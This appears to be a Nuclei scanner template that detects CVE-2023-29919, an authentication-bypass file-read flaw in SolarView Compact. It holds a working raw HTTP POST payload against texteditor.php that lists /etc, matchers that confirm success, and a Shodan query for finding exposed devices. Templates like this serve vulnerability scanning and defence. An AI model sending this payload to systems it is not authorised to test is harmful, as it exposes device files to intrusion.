id: CVE-2023-29919 info: name: SolarView Compact <= 6.00 - Local File Inclusion author: For3stCo1d severity: critical description: | There is an arbitrary read file vulnerability in SolarView Compact 6.00 and below, attackers can bypass authentication to read files through texteditor.php remediation: | Upgrade to a patched version of SolarView Compact or apply the vendor-provided security patch to mitigate the LFI vulnerability. reference: - https://github.com/xiaosed/CVE-2023-29919 - https://nvd.nist.gov/vuln/detail/CVE-2023-29919 - https://www.solarview.io/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2023-29919 cwe-id: CWE-276 epss-score: 0.01262 epss-percentile: 0.84135 cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: contec product: solarview_compact_firmware shodan-query: http.html:"SolarView Compact" tags: cve,cve2023,lfi,solarview,edb http: - raw: - | POST /texteditor.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded directory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F matchers-condition: and matchers: - type: word part: body words: - 'action="texteditor.php"' - 'adduser.conf' - 'deluser.conf' condition: and - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4b0a00483046022100cb46c62d80f486cd6c7b9bea28c95316cca8b15236b60dbfbdb543dad8d8d8ee022100f18be3a1d009dcf08330c9de6b1aa29e6337376c68a991f40509af918f21b0f8:922c64590222798bb761d5b6d8e72950